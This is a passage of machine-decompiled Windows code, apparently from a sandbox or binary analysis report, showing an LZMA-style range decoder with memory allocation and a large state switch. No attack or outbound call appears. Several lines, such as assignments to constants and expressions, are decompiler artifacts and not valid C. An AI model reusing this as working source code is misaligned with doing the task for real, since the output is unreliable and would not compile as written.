                									_t534 =  *(_t612 - 0x88);
                									if(_t534 > 0x1c) {
                										break;
                									}
                									switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
                										case 0:
                											if( *(_t612 - 0x6c) == 0) {
                												goto L170;
                											}
                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                											_t534 =  *( *(_t612 - 0x70));
                											if(_t534 > 0xe1) {
                												goto L171;
                											}
                											_t538 = _t534 & 0x000000ff;
                											_push(0x2d);
                											asm("cdq");
                											_pop(_t569);
                											_push(9);
                											_pop(_t570);
                											_t608 = _t538 / _t569;
                											_t540 = _t538 % _t569 & 0x000000ff;
                											asm("cdq");
                											_t603 = _t540 % _t570 & 0x000000ff;
                											 *(_t612 - 0x3c) = _t603;
                											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                											_t611 = (0x300 << _t603 + _t608) + 0x736;
                											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                												L10:
                												if(_t611 == 0) {
                													L12:
                													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                													goto L15;
                												} else {
                													goto L11;
                												}
                												do {
                													L11:
                													_t611 = _t611 - 1;
                													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                												} while (_t611 != 0);
                												goto L12;
                											}
                											if( *(_t612 - 4) != 0) {
                												GlobalFree( *(_t612 - 4));
                											}
                											_t534 = GlobalAlloc(0x40, 0x600); // executed
                											 *(_t612 - 4) = _t534;
                											if(_t534 == 0) {
                												goto L171;
                											} else {
                												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                												goto L10;
                											}
                										case 1:
                											L13:
                											__eflags =  *(_t612 - 0x6c);
                											if( *(_t612 - 0x6c) == 0) {
                												 *(_t612 - 0x88) = 1;
                												goto L170;
                											}
                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                											_t45 = _t612 - 0x48;
                											 *_t45 =  *(_t612 - 0x48) + 1;
                											__eflags =  *_t45;
                											L15:
                											if( *(_t612 - 0x48) < 4) {
                												goto L13;
                											}
                											_t546 =  *(_t612 - 0x40);
                											if(_t546 ==  *(_t612 - 0x74)) {
                												L20:
                												 *(_t612 - 0x48) = 5;
                												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                												goto L23;
                											}
                											 *(_t612 - 0x74) = _t546;
                											if( *(_t612 - 8) != 0) {
                												GlobalFree( *(_t612 - 8));
                											}
                											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                											 *(_t612 - 8) = _t534;
                											if(_t534 == 0) {
                												goto L171;
                											} else {
                												goto L20;
                											}
                										case 2:
                											L24:
                											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                											 *(_t612 - 0x84) = 6;
                											 *(_t612 - 0x4c) = _t553;
                											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                											goto L132;
                										case 3:
                											L21:
                											__eflags =  *(_t612 - 0x6c);
                											if( *(_t612 - 0x6c) == 0) {
                												 *(_t612 - 0x88) = 3;
                												goto L170;
                											}
                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                											_t67 = _t612 - 0x70;
                											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                											__eflags =  *_t67;
                											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                											L23:
                											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                											if( *(_t612 - 0x48) != 0) {
                												goto L21;
                											}
                											goto L24;
                										case 4:
                											L133:
                											_t531 =  *_t605;
                											_t588 = _t531 & 0x0000ffff;
                											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                											if( *(_t612 - 0xc) >= _t564) {
                												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                												 *(_t612 - 0x40) = 1;
                												_t532 = _t531 - (_t531 >> 5);
                												__eflags = _t532;
                												 *_t605 = _t532;
                											} else {
                												 *(_t612 - 0x10) = _t564;
                												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                											}
                											if( *(_t612 - 0x10) >= 0x1000000) {
                												goto L139;
                											} else {
                												goto L137;
                											}
                										case 5:
                											L137:
                											if( *(_t612 - 0x6c) == 0) {
                												 *(_t612 - 0x88) = 5;
                												goto L170;
                											}
                											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                											L139:
                											_t533 =  *(_t612 - 0x84);
                											goto L140;
                										case 6:
                											__edx = 0;
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x34) = 1;
                												 *(__ebp - 0x84) = 7;
                												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                												goto L132;
                											}
                											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                											__esi =  *(__ebp - 0x60);
                											__cl = 8;
                											__cl = 8 -  *(__ebp - 0x3c);
                											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                											__ecx =  *(__ebp - 0x3c);
                											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                											__ecx =  *(__ebp - 4);
                											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                											__eflags =  *(__ebp - 0x38) - 4;
                											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                											if( *(__ebp - 0x38) >= 4) {
                												__eflags =  *(__ebp - 0x38) - 0xa;
                												if( *(__ebp - 0x38) >= 0xa) {
                													_t98 = __ebp - 0x38;
                													 *_t98 =  *(__ebp - 0x38) - 6;
                													__eflags =  *_t98;
                												} else {
                													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                												}
                											} else {
                												 *(__ebp - 0x38) = 0;
                											}
                											__eflags =  *(__ebp - 0x34) - __edx;
                											if( *(__ebp - 0x34) == __edx) {
                												__ebx = 0;
                												__ebx = 1;
                												goto L61;
                											} else {
                												__eax =  *(__ebp - 0x14);
                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                												__eflags = __eax -  *(__ebp - 0x74);
                												if(__eax >=  *(__ebp - 0x74)) {
                													__eax = __eax +  *(__ebp - 0x74);
                													__eflags = __eax;
                												}
                												__ecx =  *(__ebp - 8);
                												__ebx = 0;
                												__ebx = 1;
                												__al =  *((intOrPtr*)(__eax + __ecx));
                												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                												goto L41;
                											}
                										case 7:
                											__eflags =  *(__ebp - 0x40) - 1;
                											if( *(__ebp - 0x40) != 1) {
                												__eax =  *(__ebp - 0x24);
                												 *(__ebp - 0x80) = 0x16;
                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                												__eax =  *(__ebp - 0x28);
                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                												__eax =  *(__ebp - 0x2c);
                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                												__al = __al & 0x000000fd;
                												__eax = (__eflags >= 0) - 1 + 0xa;
                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                												__eax =  *(__ebp - 4);
                												__eax =  *(__ebp - 4) + 0x664;
                												__eflags = __eax;
                												 *(__ebp - 0x58) = __eax;
                												goto L69;
                											}
                											__eax =  *(__ebp - 4);
                											__ecx =  *(__ebp - 0x38);
                											 *(__ebp - 0x84) = 8;
                											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                											goto L132;
                										case 8:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x84) = 0xa;
                												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                											} else {
                												__eax =  *(__ebp - 0x38);
                												__ecx =  *(__ebp - 4);
                												__eax =  *(__ebp - 0x38) + 0xf;
                												 *(__ebp - 0x84) = 9;
                												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                											}
                											goto L132;
                										case 9:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												goto L90;
                											}
                											__eflags =  *(__ebp - 0x60);
                											if( *(__ebp - 0x60) == 0) {
                												goto L171;
                											}
                											__eax = 0;
                											__eflags =  *(__ebp - 0x38) - 7;
                											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                											__eflags = _t259;
                											0 | _t259 = _t259 + _t259 + 9;
                											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                											goto L76;
                										case 0xa:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__eax =  *(__ebp - 4);
                												__ecx =  *(__ebp - 0x38);
                												 *(__ebp - 0x84) = 0xb;
                												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                												goto L132;
                											}
                											__eax =  *(__ebp - 0x28);
                											goto L89;
                										case 0xb:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												__ecx =  *(__ebp - 0x24);
                												__eax =  *(__ebp - 0x20);
                												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                											} else {
                												__eax =  *(__ebp - 0x24);
                											}
                											__ecx =  *(__ebp - 0x28);
                											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                											L89:
                											__ecx =  *(__ebp - 0x2c);
                											 *(__ebp - 0x2c) = __eax;
                											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                											L90:
                											__eax =  *(__ebp - 4);
                											 *(__ebp - 0x80) = 0x15;
                											__eax =  *(__ebp - 4) + 0xa68;
                											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                											goto L69;
                										case 0xc:
                											L100:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xc;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t335 = __ebp - 0x70;
                											 *_t335 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t335;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											__eax =  *(__ebp - 0x2c);
                											goto L102;
                										case 0xd:
                											L37:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xd;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t122 = __ebp - 0x70;
                											 *_t122 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t122;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L39:
                											__eax =  *(__ebp - 0x40);
                											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                												goto L48;
                											}
                											__eflags = __ebx - 0x100;
                											if(__ebx >= 0x100) {
                												goto L54;
                											}
                											L41:
                											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                											__ecx =  *(__ebp - 0x58);
                											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                											 *(__ebp - 0x48) = __eax;
                											__eax = __eax + 1;
                											__eax = __eax << 8;
                											__eax = __eax + __ebx;
                											__esi =  *(__ebp - 0x58) + __eax * 2;
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                											__ax =  *__esi;
                											 *(__ebp - 0x54) = __esi;
                											__edx = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												 *(__ebp - 0x40) = 1;
                												__cx = __ax >> 5;
                												__eflags = __eax;
                												__ebx = __ebx + __ebx + 1;
                												 *__esi = __ax;
                											} else {
                												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edx;
                												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                												__ebx = __ebx + __ebx;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											 *(__ebp - 0x44) = __ebx;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L39;
                											} else {
                												goto L37;
                											}
                										case 0xe:
                											L46:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xe;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t156 = __ebp - 0x70;
                											 *_t156 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t156;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											while(1) {
                												L48:
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													break;
                												}
                												__eax =  *(__ebp - 0x58);
                												__edx = __ebx + __ebx;
                												__ecx =  *(__ebp - 0x10);
                												__esi = __edx + __eax;
                												__ecx =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edi = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													_t170 = __edx + 1; // 0x1
                													__ebx = _t170;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edi;
                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													continue;
                												} else {
                													goto L46;
                												}
                											}
                											L54:
                											_t173 = __ebp - 0x34;
                											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                											__eflags =  *_t173;
                											goto L55;
                										case 0xf:
                											L58:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0xf;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t203 = __ebp - 0x70;
                											 *_t203 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t203;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L60:
                											__eflags = __ebx - 0x100;
                											if(__ebx >= 0x100) {
                												L55:
                												__al =  *(__ebp - 0x44);
                												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                												goto L56;
                											}
                											L61:
                											__eax =  *(__ebp - 0x58);
                											__edx = __ebx + __ebx;
                											__ecx =  *(__ebp - 0x10);
                											__esi = __edx + __eax;
                											__ecx =  *(__ebp - 0x10) >> 0xb;
                											__ax =  *__esi;
                											 *(__ebp - 0x54) = __esi;
                											__edi = __ax & 0x0000ffff;
                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                											__eflags =  *(__ebp - 0xc) - __ecx;
                											if( *(__ebp - 0xc) >= __ecx) {
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                												__cx = __ax;
                												_t217 = __edx + 1; // 0x1
                												__ebx = _t217;
                												__cx = __ax >> 5;
                												__eflags = __eax;
                												 *__esi = __ax;
                											} else {
                												 *(__ebp - 0x10) = __ecx;
                												0x800 = 0x800 - __edi;
                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                												__ebx = __ebx + __ebx;
                												 *__esi = __cx;
                											}
                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                											 *(__ebp - 0x44) = __ebx;
                											if( *(__ebp - 0x10) >= 0x1000000) {
                												goto L60;
                											} else {
                												goto L58;
                											}
                										case 0x10:
                											L110:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0x10;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t366 = __ebp - 0x70;
                											 *_t366 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t366;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											goto L112;
                										case 0x11:
                											L69:
                											__esi =  *(__ebp - 0x58);
                											 *(__ebp - 0x84) = 0x12;
                											L132:
                											 *(_t612 - 0x54) = _t605;
                											goto L133;
                										case 0x12:
                											goto L0;
                										case 0x13:
                											__eflags =  *(__ebp - 0x40);
                											if( *(__ebp - 0x40) != 0) {
                												_t469 = __ebp - 0x58;
                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                												__eflags =  *_t469;
                												 *(__ebp - 0x30) = 0x10;
                												 *(__ebp - 0x40) = 8;
                												goto L144;
                											}
                											__eax =  *(__ebp - 0x4c);
                											__ecx =  *(__ebp - 0x58);
                											__eax =  *(__ebp - 0x4c) << 4;
                											 *(__ebp - 0x30) = 8;
                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                											goto L130;
                										case 0x14:
                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                											__eax =  *(__ebp - 0x80);
                											L140:
                											 *(_t612 - 0x88) = _t533;
                											goto L1;
                										case 0x15:
                											__eax = 0;
                											__eflags =  *(__ebp - 0x38) - 7;
                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                											__al = __al & 0x000000fd;
                											__eax = (__eflags >= 0) - 1 + 0xb;
                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                											goto L121;
                										case 0x16:
                											__eax =  *(__ebp - 0x30);
                											__eflags = __eax - 4;
                											if(__eax >= 4) {
                												_push(3);
                												_pop(__eax);
                											}
                											__ecx =  *(__ebp - 4);
                											 *(__ebp - 0x40) = 6;
                											__eax = __eax << 7;
                											 *(__ebp - 0x7c) = 0x19;
                											 *(__ebp - 0x58) = __eax;
                											goto L145;
                										case 0x17:
                											goto L145;
                										case 0x18:
                											L146:
                											__eflags =  *(__ebp - 0x6c);
                											if( *(__ebp - 0x6c) == 0) {
                												 *(__ebp - 0x88) = 0x18;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x70);
                											__eax =  *(__ebp - 0xc);
                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											_t484 = __ebp - 0x70;
                											 *_t484 =  *(__ebp - 0x70) + 1;
                											__eflags =  *_t484;
                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                											L148:
                											_t487 = __ebp - 0x48;
                											 *_t487 =  *(__ebp - 0x48) - 1;
                											__eflags =  *_t487;
                											goto L149;
                										case 0x19:
                											__eflags = __ebx - 4;
                											if(__ebx < 4) {
                												 *(__ebp - 0x2c) = __ebx;
                												L120:
                												_t394 = __ebp - 0x2c;
                												 *_t394 =  *(__ebp - 0x2c) + 1;
                												__eflags =  *_t394;
                												L121:
                												__eax =  *(__ebp - 0x2c);
                												__eflags = __eax;
                												if(__eax == 0) {
                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                													goto L170;
                												}
                												__eflags = __eax -  *(__ebp - 0x60);
                												if(__eax >  *(__ebp - 0x60)) {
                													goto L171;
                												}
                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                												__eax =  *(__ebp - 0x30);
                												_t401 = __ebp - 0x60;
                												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                												__eflags =  *_t401;
                												goto L124;
                											}
                											__ecx = __ebx;
                											__eax = __ebx;
                											__ecx = __ebx >> 1;
                											__eax = __ebx & 0x00000001;
                											__ecx = (__ebx >> 1) - 1;
                											__al = __al | 0x00000002;
                											__eax = (__ebx & 0x00000001) << __cl;
                											__eflags = __ebx - 0xe;
                											 *(__ebp - 0x2c) = __eax;
                											if(__ebx >= 0xe) {
                												__ebx = 0;
                												 *(__ebp - 0x48) = __ecx;
                												L103:
                												__eflags =  *(__ebp - 0x48);
                												if( *(__ebp - 0x48) <= 0) {
                													__eax = __eax + __ebx;
                													 *(__ebp - 0x40) = 4;
                													 *(__ebp - 0x2c) = __eax;
                													__eax =  *(__ebp - 4);
                													__eax =  *(__ebp - 4) + 0x644;
                													__eflags = __eax;
                													L109:
                													__ebx = 0;
                													 *(__ebp - 0x58) = __eax;
                													 *(__ebp - 0x50) = 1;
                													 *(__ebp - 0x44) = 0;
                													 *(__ebp - 0x48) = 0;
                													L113:
                													__eax =  *(__ebp - 0x40);
                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                														_t392 = __ebp - 0x2c;
                														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                														__eflags =  *_t392;
                														goto L120;
                													}
                													__eax =  *(__ebp - 0x50);
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                													__eax =  *(__ebp - 0x58);
                													__esi = __edi + __eax;
                													 *(__ebp - 0x54) = __esi;
                													__ax =  *__esi;
                													__ecx = __ax & 0x0000ffff;
                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                													__eflags =  *(__ebp - 0xc) - __edx;
                													if( *(__ebp - 0xc) >= __edx) {
                														__ecx = 0;
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                														__ecx = 1;
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                														__ebx = 1;
                														__ecx =  *(__ebp - 0x48);
                														__ebx = 1 << __cl;
                														__ecx = 1 << __cl;
                														__ebx =  *(__ebp - 0x44);
                														__ebx =  *(__ebp - 0x44) | __ecx;
                														__cx = __ax;
                														__cx = __ax >> 5;
                														__eax = __eax - __ecx;
                														__edi = __edi + 1;
                														__eflags = __edi;
                														 *(__ebp - 0x44) = __ebx;
                														 *__esi = __ax;
                														 *(__ebp - 0x50) = __edi;
                													} else {
                														 *(__ebp - 0x10) = __edx;
                														0x800 = 0x800 - __ecx;
                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                														 *__esi = __dx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														L112:
                														_t369 = __ebp - 0x48;
                														 *_t369 =  *(__ebp - 0x48) + 1;
                														__eflags =  *_t369;
                														goto L113;
                													} else {
                														goto L110;
                													}
                												}
                												__ecx =  *(__ebp - 0xc);
                												__ebx = __ebx + __ebx;
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                													__ecx =  *(__ebp - 0x10);
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                													__ebx = __ebx | 0x00000001;
                													__eflags = __ebx;
                													 *(__ebp - 0x44) = __ebx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													L102:
                													_t339 = __ebp - 0x48;
                													 *_t339 =  *(__ebp - 0x48) - 1;
                													__eflags =  *_t339;
                													goto L103;
                												} else {
                													goto L100;
                												}
                											}
                											__edx =  *(__ebp - 4);
                											__eax = __eax - __ebx;
                											 *(__ebp - 0x40) = __ecx;
                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                											goto L109;
                										case 0x1a:
                											L56:
                											__eflags =  *(__ebp - 0x64);
                											if( *(__ebp - 0x64) == 0) {
                												 *(__ebp - 0x88) = 0x1a;
                												goto L170;
                											}
                											__ecx =  *(__ebp - 0x68);
                											__al =  *(__ebp - 0x5c);
                											__edx =  *(__ebp - 8);
                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
